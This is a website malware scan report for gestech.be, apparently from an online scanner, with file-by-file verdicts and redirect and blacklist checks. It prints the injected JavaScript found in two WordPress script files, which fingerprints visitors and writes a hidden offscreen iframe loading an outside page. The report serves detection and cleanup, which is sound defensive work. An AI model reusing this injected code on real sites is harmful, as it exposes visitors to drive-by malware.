Scanned pages/files
Request | Server response | Status |
http://gestech.be/ | 200 OK Content-Length: 12340 Content-Type: text/html | clean |
http://gestech.be/wp-includes/js/comment-reply.min.js?ver=3.6 | 200 OK Content-Length: 967 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://bigahuresa.sarahlai.com/lordesman15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://gestech.be/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94095 Content-Type: application/javascript | clean |
http://gestech.be/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8167 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); Antivirus reports:
| ||
http://gestech.be/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.39.0-2013.07.31 | 200 OK Content-Length: 14611 Content-Type: application/javascript | clean |
http://gestech.be/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.5.1 | 200 OK Content-Length: 8326 Content-Type: application/javascript | clean |
http://gestech.be/le-gestech-pour-mon-sel/ | 200 OK Content-Length: 11428 Content-Type: text/html | clean |
http://gestech.be/le-gestech-pour-mon-sel/demo/ | 200 OK Content-Length: 12343 Content-Type: text/html | clean |
http://gestech.be/le-gestech-pour-mon-sel/faq/ | 200 OK Content-Length: 18310 Content-Type: text/html | clean |
http://gestech.be/le-gestech-pour-mon-sel/demander-le-gestech/ | 200 OK Content-Length: 16480 Content-Type: text/html | clean |
http://gestech.be/installation/ | 200 OK Content-Length: 19035 Content-Type: text/html | clean |
http://gestech.be/installation/telechargement/ | 200 OK Content-Length: 13528 Content-Type: text/html | clean |
http://gestech.be/installation/importation-des-donnees/ | 200 OK Content-Length: 17178 Content-Type: text/html | clean |
http://gestech.be/installation/configuration/ | 200 OK Content-Length: 14815 Content-Type: text/html | clean |
http://gestech.be/support/ | 200 OK Content-Length: 13561 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gestech.be
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 19:22:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: startBAK=R3415745932; path=/; expires=Tue, 26-Aug-2014 20:27:33 GMT
Set-Cookie: start=R3918429717; path=/; expires=Tue, 26-Aug-2014 20:29:30 GMT
X-Pingback: http://gestech.be/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: gestech.be
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 19:22:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: startBAK=R3415745932; path=/; expires=Tue, 26-Aug-2014 20:27:33 GMT
Set-Cookie: start=R3918429717; path=/; expires=Tue, 26-Aug-2014 20:29:30 GMT
X-Pingback: http://gestech.be/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: gestech.be
Referer: http://www.google.com/search?q=gestech.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gestech.be
Referer: http://www.google.com/search?q=gestech.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gestech.be
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gestech.be/
Result: gestech.be is not infected or malware details are not published yet.
Result: gestech.be is not infected or malware details are not published yet.